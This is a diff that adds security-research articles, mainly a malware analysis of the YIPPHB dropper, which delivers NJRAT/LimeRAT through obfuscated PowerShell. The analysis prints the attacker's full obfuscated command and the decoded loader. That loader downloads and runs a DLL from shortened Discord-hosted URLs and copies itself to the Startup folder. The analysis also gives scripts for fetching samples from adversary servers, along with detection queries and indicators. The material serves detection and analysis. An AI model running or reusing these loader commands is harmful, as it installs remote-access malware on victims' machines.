'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwATIK8ArwATIBMgrwATIBMgrwCvACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AGkAbgB5AH⌚⌚⌚AcgBsAC4AYwBvAG0ALwAyAG⌚⌚⌚AcgBwAGgANgBjAHMAJwApACkAOwBbAHMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAG⌚⌚⌚AdAB⌚⌚⌚AHkAcABlACgAJwBOAHcAZwBvAHgATQAuAEsA⌚⌚⌚ABKAGEATgBqACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBQAF⌚⌚⌚AbABHAEsAQQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuADAAMAAwADgAdABjAG8AMAAxAC8AMQA3ADkAOAAxADIAOAAyADQAOQAzADgAMgA4ADgANAAzADAAMQAvADMAMgA1ADkANwAxADkAMgA0ADkAOQA2ADMANgA1ADYANQA5AC8AcwB0AG4AZQBtAGgAYwBhAHQAdABhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwAHQAdABoACcAIAAsACAAJABSAG8AZABhAEMAbwBwAHkAIAAsACAAJwAQEMwGJwbMBicAIAApACkA';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('-¯¯--¯--¯¯', '[redacted].vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
+```
+
+While this technique is not overly complex in that it simply replaces the icons with an ASCII character, it is creative. This technique could delay automated analysis of Base64 encoded strings unless the Powershell command was either fully executed or an analysis workflow was leveraged to process Unicode and replacement functions.
+
+Looking at the Powershell command, we were able to identify a simple process to replace the Unicode watch icons (⌚⌚⌚) with a **U**. To illustrate what’s happening, we can use the data analysis tool created by the GCHQ: [CyberChef](https://gchq.github.io/CyberChef/).
+
+By loading the “Find / Replace”, the “Decode Base64”, and the “Decode text (UTF-16LE)” recipes, we can decode the Powershell string.
+
+![Decoding the Unicode Base64 Powershell string](/assets/images/doing-time-with-the-yipphb-dropper/image5.png)
+
+Within the decoded string we can see how the loader, follow-on dropper, and implant are installed.
+
+```
+$RodaCopy = '-¯¯--¯--¯¯';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://tinyurl[.]com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('txt.0008tco01/1798128249382884301/325971924996365659/stnemhcatta/moc[.]ppadrocsid.ndc//:sptth' , $RodaCopy , 'တیای' ))
+```
+
+The loader is downloaded from `https://tinyurl[.]com/2erph6cs`. TinyURL is a popular URL shortening service, and while it has very legitimate uses, it can also be abused to hide malicious URLs that blend into normal network traffic.
+
+To unfurl the TinyURL, we can use the JSON API endpoint from [Unshorten.me](https://unshorten.me/):
+
+```
+$ curl https://unshorten.me/json/tinyurl[.]com/2erph6cs
+{
+    "requested_url": "tinyurl[.]com/2erph6cs",
+    "success": true,
+    "resolved_url": "https://cdn.discordapp[.]com/attachments/1023796232872792096/1023798426636402818/dllsica.txt",
+    "usage_count": 3,
+    "remaining_calls": 8
+}
+```
+
+Downloading **dllsica.txt** from the Discord content delivery network provided us with another Base64-encoded string. Unlike the previous Powershell string, the string from **dllsica.txt** can easily be decoded without substitutions.
+
+Using the **cat** , **base64** , **xxd** , and **head** command line tools, we can see that this has a hexadecimal value of **4d5a** and an MZ magic number in the file header. This confirms we’re analyzing a PE file.
+
+- **cat** - catenates a file
+- **base64 -D** - the **-D** switch decodes a base64 encoded file
+- **xxd** - creates a hexadecimal dump of an input
+- **head** - returns the first 10 lines of a file
+
+```
+$ cat dllsica.txt | base64 -D | xxd | head
+
+00000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000  MZ..............
+00000010: b800 0000 0000 0000 4000 0000 0000 0000  ........@.......
+00000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
+00000030: 0000 0000 0000 0000 0000 0000 8000 0000  ................
+00000040: 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468  ........!..L.!Th
+00000050: 6973 2070 726f 6772 616d 2063 616e 6e6f  is program canno
+...truncated...
+```
+
+Next, we deobfuscated the binary, wrote it to disk, then generated a SHA-256 hash.
+
+- **file** - verify the file type
+- **shasum -a 256** - the -a 256 switch uses the 256-bit hashing algorithm
+
+```
+$ cat dllsica.txt | base64 -D > dllsica.bin
+
+$ file dllsica.bin
+dllsica.bin: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
+
+$ shasum -a 256 dllsica.bin
+49562fda46cfa05b2a6e2cb06a5d25711c9a435b578a7ec375f928aae9c08ff2
+```
+
+Now that the loader has been collected, it executes the method **PUlGKA** inside of the class **NwgoxM.KPJaN**. From the original Base64 decoded string
+
+```
+…truncated…
+GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]]
+...truncated…:
+```
+
+![The loader’s execution](/assets/images/doing-time-with-the-yipphb-dropper/image7.png)
+
+We may publish future research on this loader, which maintains access by copying itself into the user's Startup folder as a natively-supported VBscript.
+
+```
+FileSystem.FileCopy(RodaCopy, Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + NameCopy + ".vbs");
+```
+
+### Dropper phase
+
+From the loader's execution image above, we can see that the loader uses a reversed variable (**text = bdw6ufv4/moc[.]lruynit//:sptth**) to download an additional file using a TinyURL. Using the command line tool, **rev** , we can correct the reversed URL.
+
+```
+$ echo "bdw6ufv4/moc.lruynit//:sptth" | rev
+
+https://tinyurl[.]com/4vfu6wd
+```
+
+We can unfurl the TinyURL using the Unshorten.me JSON API endpoint to identify the download location of the dropper.
+
+```
+$ curl https://unshorten.me/json/tinyurl[.]com/4vfu6wd
+{
+    "requested_url": "tinyurl[.]com/4vfu6wd",
+    "success": true,
+    "resolved_url": "https://cdn.discordapp[.]com/attachments/1023796232872792096/1023796278213234758/pesica.txt",
+    "usage_count": 2,
+    "remaining_calls": 9
+}
+```
+
+Another encoded file is downloaded from Discord: **pesica.txt**. As of this writing, VirusTotal reports zero detections of this file.
+
+With clues from **dllsica.bin** , we can see that **pesica.txt** uses UTF-8 encoding. To further analyze our file, we need to replace the **▒▒▒▒** values with an **A** , and Base64 decode the resulting strings.
+
+```
+…truncated…
+string text = "bdw6ufv4/moc[.]lruynit//:sptth";
+string text2 = new WebClient
+{
+	Encoding = Encoding.UTF8
+}.DownloadString(Strings.StrReverse(text));
+text2 = Strings.StrReverse(text2);
+text2 = text2.Replace("▒▒▒▒", "A");
+string text3 = new WebClient().DownloadString(Strings.StrReverse(_5));
+text3 = Strings.StrReverse(text3);
+…truncated…
+	{
+	text4 + "\\InstallUtil.exe",
+	Convert.FromBase64String(text3)
+	});
+…truncated…
+```
+
+We can stack recipes to perform these functions with CyberChef.
+
+![Using CyberChef to decode pesica.txt](/assets/images/doing-time-with-the-yipphb-dropper/image2.png)
+
+Once we’ve decoded **pesica.txt** , we calculate the hash **bba5f2b1c90cc8af0318502bdc8d128019faa94161b8c6ac4e424efe1165c2cf**. The decoded output of **pesica.txt** shows the **YippHB** module name.
+
+```
+...truncated...
+ToInt16
+<Module>
+YippHB
+ResumeThread_API
+...truncated...
+```
+
+This module name is where the dropper name of YIPPHB is derived from. YIPPHB was originally discovered by security researcher [Paul Melson](https://twitter.com/pmelson). Paul [publicly disclosed](https://github.com/pmelson/bsidesaugusta_2022/blob/main/unk.yara) this dropper in October of 2022 at the Augusta BSides security conference.
+
+The YIPPHB dropper is executed using the [Installutil.exe](https://learn.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool) command-line utility to start the RAT phase.
+
+> We are referring to the next phase as the RAT phase. All of the binaries we were able to collect in this phase were RAT implants (NJRAT, LIMERAT, and ASYNCRAT); however, the modular nature of this intrusion set would allow for any implant type to be used.
+
+### RAT phase
+
+Now that the YIPPHB dropper has been executed, it picks up the second part of the original Unicode icon script to install the RAT implant.
+
+```
+…truncated…
+('txt.0008tco01/1798128249382884301/325971924996365659/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $RodaCopy , 'တیای' ))
+```
+
+The RAT was retrieved from `https://cdn.discordapp[.]com/attachments/956563699429179523/1034882839428218971/10oct8000.txt`, which is reversed from **txt.0008tco01/1798128249382884301/325971924996365659/stnemhcatta/moc[.]ppadrocsid.ndc//:sptth**.
+
+Looking at the file **10oct8000.txt** file, we can see that it is a reversed, Base64-encoded file.
+
+```
+=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…truncated…
+```
+
+We can correct this file and Base64 decode it using the command-line tools **rev** and **base64** and save the output as **10oct8000.bin**.
+
+```
+$ cat 10oct8000.txt | rev | base64 -D > 10oct8000.bin
+```
+
+**10oct8000.bin** has a SHA256 hash of **1c1910375d48576ea39dbd70d6efd0dba29a0ddc9eb052cadd583071c9ca7ab3**. This file is reported on VirusTotal as a variant of the [LIMERAT](https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat) or [NJRAT](https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat) malware families (depending on the source).
+
+Like the loader and YIPPHB dropper, we’ll look at some basic capabilities of the RAT, but not fully reverse it. Researching these capabilities led us to previous research that associates this sample with NJRAT or LIMERAT ([1](https://neonprimetime.blogspot.com/2018/10/njrat-lime-ilspy-decompiled-code-from.html), [2](https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/)).
+
+The RAT starts its execution routine by connecting back to the command and control server. In a separate thread, it also starts a keylogger routine to gather as much information as possible.
+
+![NJRAT C2 configuration variables](/assets/images/doing-time-with-the-yipphb-dropper/image8.png)
+
+For the connection to the command and control server, the RAT uses the configuration information listed as global variables. The victimName variable ( **TllBTiBDQVQ=** ) is a Base64 encoded string that decodes to “NYAN CAT”. Based on the code similarity with [a known NJRAT code base](https://github.com/NYAN-x-CAT/njRAT-0.7d-Stub-CSharp/blob/master/njRAT%20C%23%20Stub/Program.cs), this C2 configuration information adds to our conviction that this is related to NJRAT.
+
+![NJRAT code from Github](/assets/images/doing-time-with-the-yipphb-dropper/image4.jpg)
+
+If the RAT is connected to a command and control server that is listening for commands, it sends the following additional information:
+
+- victimName ( **vn** )
+- Hardware ID
+- Username
+- OSFullName
+- OSVersion Servicepack
+- if the Program Files folder ends in **X86** or not
+- if a webcam is present
+- the window name
+- a permission check on the registry
+
+If successfully connected to a C2 server, the operator is able to interact with the implant through a series of commands. Security researchers Hido Cohen and CyberMasterV provide a thorough explanation of these commands, and the overall functionality of the RAT, [here](https://hidocohen.medium.com/njrat-malware-analysis-198188d6339a) and [here](https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/)
+
+### Activity clusters
+
+We were able to run additional searches through our telemetry data to identify several clusters of activity. We’ve provided an EQL query below:
+
+```
+intrusion_detection where (process.pe.original_file_name == "PowerShell.EXE" and process.command_line like "*Unicode.GetString*" and process.args like "*replace*")
+```
+
+This query allowed us to identify Powershell activity that uses both Unicode characters and the **replace** function.
+
+![Timeline of REF4526 events](/assets/images/doing-time-with-the-yipphb-dropper/image6.png)
+
+Looking at these results, we were able to cluster activity by the variable name in combination with the Unicode icon. In the example that sourced this initial research, one cluster would be the variable **iUqm** and the ⌚⌚⌚Unicode icons.
+
+| Cluster ID | Variable | Unicode icon + number | Percentage of prevalence (rounded) |
+| ---------- | -------- | --------------------- | ---------------------------------- |
+| 1          | ngfYq    | ❞ (U+275E)            | 1%                                 |
+| 2          | Codigo   | ❤ (U+2764)           | 1%                                 |
+| 3          | iUqm     | ⌚ (U+231A)           | 9%                                 |
+| 4          | iUqm     | ⚔ (U+2694)           | 6%                                 |
+| 5          | Codigo   | ⁂ (U+2042)            | 62%                                |
+| 6          | iUqm     | ✌ (U+270C)           | 1%                                 |
+| 7          | Codigo   | ⏏ (U+23CF)           | 1%                                 |
+| 8          | Cg1O     | ☈ (U+2608)            | 5%                                 |
+| 9          | Codigo   | ♔ (U+2654)            | 10%                                |
+| 10         | iUqm     | ﭏ (U+FB4F)            | 1%                                 |
+| 11         | Codigo   | \_\*\/\}+/\_=         | 1%                                 |
+| 12         | iUqm     | ☈ (U+2608)            | 2%                                 |
+
+Of note, cluster 11 uses all of the same techniques as the other clusters, but instead of a Unicode icon for substitution, it used a series of ASCII characters ( **\_\*\/\}+/\_=** ). The intrusion operated the same way and we are unclear why this cluster deviated from using a Unicode icon.
+
+### Collecting and parsing network data
+
+To scale the analysis of this intrusion set, we wanted to automate the extraction of the loader and dropper encoded URLs from the **process.command_line** fields and the follow-on C2 used by the RAT implants.
+
+#### Loader and Dropper
+
+As noted in the Loader and Dropper phases, the Base64-encoded string needs substitution of the Unicode icons and to be reversed and decoded. After that process, the first URL is readily available, while the second URL requires reversing yet again.
+
+To avoid execution of the Powershell command itself, we can leverage the text processing tool **awk**. What follows is a breakdown of how to do the analysis and we’ll provide a shell script with all of it for reference.
+
+To get started, we’ll need to get access to our data on the command line where we can pipe it to **awk**. We’ve [published a tool](https://github.com/elastic/securitylabs-thrunting-tools) called **eql-query** (and another called **lucene-query** ) to do just that.
+
+Using **eql-query** , we can run an EQL query to retrieve the last 180-days of results, retrieving only the **process.command_line** field. The value of doing this from the command line is that it allows us to further parse the data and pull out additional strings of interest.
+
+```
+eql-query --since 'now-180d/d' --size=1000 --compact --fields 'process.command_line' 'intrusion_detection where (process.pe.original_file_name == "PowerShell.EXE" and process.command_line like "*Unicode.GetString*" and process.args like "*replace*")'
+```
+
+Next, use **jq** to pass the raw string to **awk** using **jq '.\_source.process.command_line' -r | awk**.
+
+> If you’re doing this iteratively, it’s best to write the results from **eql-query** to a file, and then operate on the results locally until you have your pipeline how you’d like it.
+
+The next step is to capture the strings used in the Powershell **replace** commands so we can perform that function ourselves. The best way to do this using **awk** is by capturing them with a regular expression.
+
+This matches the first and second arguments to replace. The first argument is Unicode and possibly not friendly as an **awk** pattern, so we’ll need to escape it first. Once we’ve made the replacement, we’ll print out the “clean” code, the string to find, and the replacement text.
+
+```
+function escape_string( str ) {
+    gsub(/[\\.^$(){}\[\]|*+?]/, "\\\\&", str)
+    return str
+}
+{
+    match($0, /replace\('\''(.*)'\'' *, *'\''(.*)'\''/, arr);
+    str=escape_string(arr[1]);
+    rep=arr[2];
+    print gensub(str, rep, "g")
+}
+```
+
+Finally we can **grep** out the Base64 code (using another regex) and reveal the obfuscated Powershell script.
+
+```
+grep -oP ''\''\K[A-Za-z0-9+/]+={0,2}(?='\'';)'
+```
+
+This automates the manual conversion process we outlined in the Loader, Dropper, and RAT phases above.
+
+```
+$RodaCopy = '-¯¯--¯--¯¯';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://tinyurl[.]com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('txt.0008tco01/1798128249382884301/325971924996365659/stnemhcatta/moc[.]ppadrocsid.ndc//:sptth' , $RodaCopy , 'တیای' ))
+```
+
+Parsing the URLs from this text should be another simple **awk** match, followed by flipping the second URL, however, Powershell’s default encoding is **UTF-16LE** and **awk** only supports **UTF-8** or ASCII encoding. A tool called [**iconv**](https://linux.die.net/man/1/iconv) can perform the necessary conversion.
+
+```
+echo "${line}" | base64 -d | iconv -f UTF-16 -t UTF-8 | awk '{ if ( match($0, /'\''([^'\'']+\/\/:s?ptth)'\''/, arr)) { n=split(arr[1],arr2,""); for(i=1;i<=n;i++){s=arr2[i] s}; print s}; if ( match($0, /'\''(https?:\/\/[^'\'']+)'\''/, arr)){ print arr[1] } }'
+```
+
+Once converted, the rest is straightforward parsing. Our output will contain **url1** , **url2** , and a copy of the Unicode strings and their replacements. The URLs are the forward and reverse URLs for each code sample, respectively.
+
+| Unicode icon | Replacement | url1                                         | url2                                                         |
+| ------------ | ----------- | -------------------------------------------- | ------------------------------------------------------------ |
+| ⌚⌚⌚        | U           | `https://tinyurl[.]com/2erph6cs`             | `https://cdn.discordapp[.]com/...truncated.../10oct8000.txt` |
+| ⌚⌚⌚        | U           | `http://91.241.19[.]49/ARTS/dllf3txt`        | `http://91.241.19[.]49/test/new/ZX1.txt`                     |
+| ⁂            | A           | `http://20.231.55[.]108/dll/06-07-2022.PDF`  | `http://212.192.246[.]226/dsaffdffa.txt`                     |
+
+For further details or to try it against your own data, see the [shell script](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8f67cd063158a2dc/637bc872cca9f010a904ea67/ref4526_url_extraction.zip) that combines it all.
+
+Now that we have automated the collection and parsing of the URLs for the loader and dropper, we can move on to the RAT infrastructure.
+
+#### RAT
+
+As evident in the original Powershell script, we know the RAT uses additional network infrastructure. To enumerate this, we need to pull down the RAT much like the dropper would, take a unique set URLs for each **url1** and **url2** output in the previous step, loop through each list, and use **curl** to download them.
+
+> This process requires interacting with adversary-owned or controlled infrastructure. Interacting with adversary infrastructure requires disciplined preparation that not all organizations are ready to pursue. If you don't already have strong knowledge of legal considerations, defensive network egress points, sandboxes, an intelligence gain/loss strategy, etc., the following is presented informationally.
+
+As the loader never saves the downloaded files to disk and there aren’t always filenames, so to keep track of samples, we’ll use a simple counter. This gives us this simple loop:
+
+```
+ctr=1
+for line in $(cat ../url-1.txt); do
+    curl -v -A "${USER_AGENT}" -o "file-${ctr}" -L --connect-timeout 10 "${line}" 2>>"log-${ctr}.txt"
+    ctr=$((ctr + 1))
+done
+```
+
+We use **-v** to capture the request and response headers, **-L** to follow redirects, and **--connect-timeout** to speed up the process when the infrastructure is down. Finally, save the **curl** output to a log file while any files downloaded are saved as **file-X** , where **X** is the value of the counter.
+
+Any RAT files downloaded are Base64-encoded. We can identify valid Base64-encoded files using the **file** command. A Base64-encoded file will be identified as “ASCII text, with very long lines (_length_), with no line terminators” where _length_ is the file size. For files that match this language, we’ll decode them and save them with a **.dll** extension.
+
+```
+for entry in $(file file-?? | awk -F": " '$2 ~ /^ASCII text.*very long lines/  {print $1}'); do
+    rev  <"${entry}" | base64 -d >"${entry}.dll"
+done
+```
+
+Now that we have the RAT binaries, we can do some typical static analysis on them. If you have the [VirusTotal command line tool](https://github.com/VirusTotal/vt-cli) and can make API queries, searching for known files is another simple loop over all the saved **dll** files.
+
+```
+for entry in *.dll; do
+	hash=$(sha256sum "${entry}" | awk '{print $1}')
+	vt search "${hash}" >"${entry}.vt.yml"
+done
+```
+
+Looking at the output, we can see that any **yml** file (the **vt** command output) with **0** bytes means no match. These files are unknown to VirusTotal. In this output, we can see that **file-30.dll** , **file-31.dll** , and **file-34.dll** are unknown to VirusTotal.
+
+```
+$ ls -s *.dll{,.vt.yml}
+
+ 32 file-28.dll
+ 32 file-28.dll.vt.yml
+ 32 file-30.dll
+  0 file-30.dll.vt.yml
+ 32 file-31.dll
+  0 file-31.dll.vt.yml
+468 file-34.dll
+  0 file-34.dll.vt.yml
+ 48 file-35.dll
+ 40 file-35.dll.vt.yml
+ 80 file-38.dll
+ 36 file-38.dll.vt.yml
+```
+
+The final analysis we’re going to perform is to attempt to dump any domain names from the DLLs. For many executable file formats, the **strings** command can provide that information. Unfortunately, most of these DLLs are .Net assemblies and the **strings** command won’t work to extract strings from .Net assemblies. The **file** command can again help us identify these as in this example:
+
+```
+$ file file-31.dll
+file-31.dll: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
+```
+
+The upside of .Net is that it is easily disassembled and the Mono project provides a tool just for that purpose, [**ikdasm**](https://www.mono-project.com/docs/tools+libraries/tools/). This gives us our final loop to search for domain names or references to HTTP URLs.
+
+```
+for item in *.dll; do
+    ikdasm "${item}" | grep -E '(\.(org|com|net|ly))|((yl|ten|moc|gro)\.)|("http|ptth")';
+Done
+```
+
+For more details you can refer to this [shell script](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdeb8fbbb0f53fa97/637bc87271c75510a0ca1a95/ref4526_rat_collection.zip) that puts this second stage of analysis together.
+
+## Diamond Model
+
+Elastic Security utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between adversaries and victims of intrusions.
+
+![REF4526 diamond model](/assets/images/doing-time-with-the-yipphb-dropper/image1.png)
+
+## Observed adversary tactics and techniques
+
+Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
+
+### Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+- [Resource Development](https://attack.mitre.org/tactics/TA0042/)
+- [Execution](https://attack.mitre.org/tactics/TA0002/)
+- [Persistence](https://attack.mitre.org/tactics/TA0003/)
+- [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)
+- [Discovery](https://attack.mitre.org/tactics/TA0007/)
+- [Command and Control](https://attack.mitre.org/tactics/TA0011/)
+
+### Techniques / Sub techniques
+
+Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.
+
+- [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583/)
+- [Stage Capabilities: Upload Malware](https://attack.mitre.org/techniques/T1608/001/)
+- [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001/)
+- [Command and Scripting Interpreter: Visual Basic](https://attack.mitre.org/techniques/T1059/005/)
+- [Command and Scripting Interpreter: PowerShell](https://attack.mitre.org/techniques/T1059/001/)
+- [System Binary Proxy Execution: InstallUtil](https://attack.mitre.org/techniques/T1218/004/)
+- [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/)
+
+## Detection logic
+
+### Behavior rules
+
+- [Connection to WebService by a Signed Binary Proxy](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_connection_to_webservice_by_a_signed_binary_proxy.toml)
+- [Suspicious PowerShell Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_powershell_execution.toml)
+- [Process Execution with Unusual File Extension](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_execution_with_unusual_file_extension.toml)
+- [Script File Written to Startup Folder](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/persistence_script_file_written_to_startup_folder.toml)
+- [Suspicious PowerShell Execution via Windows Scripts](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_powershell_execution_via_windows_scripts.toml)
+- [Connection to Dynamic DNS Provider by an Unsigned Binary](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_connection_to_dynamic_dns_provider_by_an_unsigned_binary.toml)
+
+### Hunting queries
+
+Identifying Unicode in Powershell can be accomplished with either a KQL or EQL query.
+
+The events for both KQL and EQL are provided with the Elastic Agent using the Elastic Defend integration.
+
+#### KQL query
+
+Using the Discover app in Kibana, the below query will identify the use of Powershell with Unicode strings. While this identified all of the events in this research, it also identified other events that were not part of the REF4526 intrusion set.
+
+The proceeding and preceding wildcards ( **\*** ) can be an expensive search over a large number of events.
+
+```
+process.pe.original_file_name : "PowerShell.EXE" and process.command_line : (*Unicode.GetString* and *replace*)
+```
+
+#### EQL query
+
+Using the [Timeline section](https://www.elastic.co/guide/en/security/current/timelines-ui.html#filter-with-eql) of the Security Solution in Kibana under the “Correlation” tab, this query will identify the use of Powershell with Unicode strings and the **replace** function. This identified all observed REF4526 events.
+
+```
+intrusion_detection where (process.pe.original_file_name == "PowerShell.EXE" and process.command_line like "*Unicode.GetString*" and process.args like "*replace*")
+```
+
+## References
+
+The following were referenced throughout the above research:
+
+- [https://github.com/pmelson/bsidesaugusta_2022/blob/main/unk.yara](https://github.com/pmelson/bsidesaugusta_2022/blob/main/unk.yara)
+- [https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat](https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat)
+- [https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat](https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat)
+- [https://neonprimetime.blogspot.com/2018/10/njrat-lime-ilspy-decompiled-code-from.html](https://neonprimetime.blogspot.com/2018/10/njrat-lime-ilspy-decompiled-code-from.html)
+- [https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/](https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/)
+- [https://github.com/NYAN-x-CAT/njRAT-0.7d-Stub-CSharp/blob/master/njRAT%20C%23%20Stub/Program.cs](https://github.com/NYAN-x-CAT/njRAT-0.7d-Stub-CSharp/blob/master/njRAT%20C%23%20Stub/Program.cs)
+- [https://hidocohen.medium.com/njrat-malware-analysis-198188d6339a](https://hidocohen.medium.com/njrat-malware-analysis-198188d6339a)
+- [https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/](https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/)
+
+## Observables
+
+All observables are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc0eb869ac242975f/637bf8b1fa033a109b5d94bd/ref4526-indicators.zip) in both ECS and STIX format in a combined zip bundle.
+
+The following observables were discussed in this research.
+
+| Observable                                                                                      | Type        | Reference     | Note                             |
+| ----------------------------------------------------------------------------------------------- | ----------- | ------------- | -------------------------------- |
+| 49562fda46cfa05b2a6e2cb06a5d25711c9a435b578a7ec375f928aae9c08ff2                                | SHA-256     | dllsica.bin   | Initial loader                   |
+| bba5f2b1c90cc8af0318502bdc8d128019faa94161b8c6ac4e424efe1165c2cf                                | SHA-256     | pesica.bin    | YIPPHB downloader                |
+| 1c1910375d48576ea39dbd70d6efd0dba29a0ddc9eb052cadd583071c9ca7ab3                                | SHA-256     | 10oct8000     | NJRAT implant                    |
+| `https://cdn.discordapp[.]com/attachments/956563699429179523/1034882839428218971/10oct8000.txt` | url         | Loader phase  | NJRAT download location          |
+| `https://tinyurl[.]com/2erph6cs`                                                                | url         | Loader phase  | REF4526 loader download location |
+| `https://tinyurl[.]com/4vfu6wd`                                                                 | url         | Dropper phase | YIPPHB download location         |
+| wins10ok.duckdns[.]org                                                                          | domain-name | NJRAT C2      | NA                               |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/doubling_down_etw_callstacks.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/doubling_down_etw_callstacks.md
new file mode 100644
index 0000000000000..6a82fe203c4eb
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/doubling_down_etw_callstacks.md
@@ -0,0 +1,217 @@
+---
+title: "Doubling Down: Detecting In-Memory Threats with Kernel ETW Call Stacks"
+slug: "doubling-down-etw-callstacks"
+date: "2024-01-09"
+description: "With Elastic Security 8.11, we added further kernel telemetry call stack-based detections to increase efficacy against in-memory threats."
+author:
+  - slug: john-uhlmann
+  - slug: samir-bousseaden
+image: "photo-edited-01.png"
+category:
+  - slug: security-research
+tags:
+  - slug: security-research
+  - slug: security-operations
+  - slug: detection-science
+---
+
+## Introduction
+
+We were pleased to see that the [kernel call stack](https://www.elastic.co/security-labs/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks) capability we released in 8.8 was met with [extremely](https://x.com/Kostastsale/status/1664050735166930944) [positive](https://x.com/HackingLZ/status/1663897174806089728) [community feedback](https://twitter.com/bohops/status/1726251988244160776) - both from the offensive research teams attempting to evade us and the defensive teams triaging alerts faster due to the additional [context](https://www.elastic.co/security-labs/peeling-back-the-curtain-with-call-stacks).
+
+But this was only the first step: We needed to arm defenders with even more visibility from the kernel - the most reliable mechanism to combat user-mode threats. With the introduction of Kernel Patch Protection in x64 Windows, Microsoft created a shared responsibility model where security vendors are now limited to only the kernel visibility and extension points that Microsoft provides. The most notable addition to this visibility is the [Microsoft-Windows-Threat-Intelligence Event Tracing for Windows](https://github.com/jdu2600/Windows10EtwEvents/blob/master/manifest/Microsoft-Windows-Threat-Intelligence.tsv)(ETW) provider.
+
